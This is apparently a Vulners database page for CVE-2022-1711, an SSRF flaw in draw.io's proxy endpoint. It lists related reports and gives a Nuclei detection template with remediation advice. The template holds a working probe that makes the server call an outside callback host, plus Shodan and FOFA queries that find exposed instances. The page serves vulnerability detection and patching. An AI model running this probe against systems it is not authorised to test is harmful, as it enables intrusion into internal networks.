| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-1711 | 17 May 202213:15 | – | attackerkb | |
| SSRF via Unvalidated Redirects in ProxyServlet | 12 May 202220:03 | – | huntr | |
| CVE-2022-1711 | 17 May 202216:27 | – | circl | |
| JGraph draw.io 代码问题漏洞 | 17 May 202200:00 | – | cnnvd | |
| CVE-2022-1711 | 17 May 202212:40 | – | cve | |
| CVE-2022-1711 Server-Side Request Forgery (SSRF) in jgraph/drawio | 17 May 202212:40 | – | cvelist | |
| CVE-2022-1711 | 17 May 202213:15 | – | nvd | |
| CVE-2022-1711 Server-Side Request Forgery (SSRF) in jgraph/drawio | 17 May 202212:40 | – | osv | |
| Server side request forgery (ssrf) | 17 May 202213:15 | – | prion | |
| PT-2022-14063 · Unknown · Jgraph/Drawio | 17 May 202200:00 | – | ptsecurity |
id: CVE-2022-1711
info:
name: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)
author: ritikchaddha
severity: high
description: |
Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration.
impact: |
Unauthenticated attackers can perform SSRF attacks via the proxy endpoint to access internal resources, scan internal networks, or retrieve sensitive data from internal systems.
remediation: |
Update to draw.io/diagrams.net version 18.0.5 or later. The patch adds isLinkLocalAddress() checks to restrict proxy request destinations. If patching isn't possible, implement network controls to limit server connections to internal systems.
reference:
- https://huntr.dev/bounties/c32afff5-6ad5-4d4d-beea-f55ab4925797
- https://github.com/jgraph/drawio/commit/cf5c78aa0f3127fb10053db55b39f3017a0654ae
- https://nvd.nist.gov/vuln/detail/CVE-2022-1711
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1711
cwe-id: CWE-918
epss-score: 0.05372
epss-percentile: 0.91682
metadata:
vendor: diagrams
product: drawio
verified: true
shodan-query: html:"draw.io"
fofa-query: body="draw.io"
tags: cve,cve2022,ssrf,drawio,diagrams,jgraph,vuln
http:
- method: GET
path:
- "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(interactsh_protocol, 'dns')"
- "contains(content_type, 'application/octet-stream')"
condition: and
# digest: 4a0a00473045022100896eb32a468813c5606509b30e7ab165e2da3c2db6c3ff7bd0146d13adad2b3b02204d01b03ce816c341e182b787a5f263e0b7b6e3bda8f94202cc28be8d04ca2bb6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation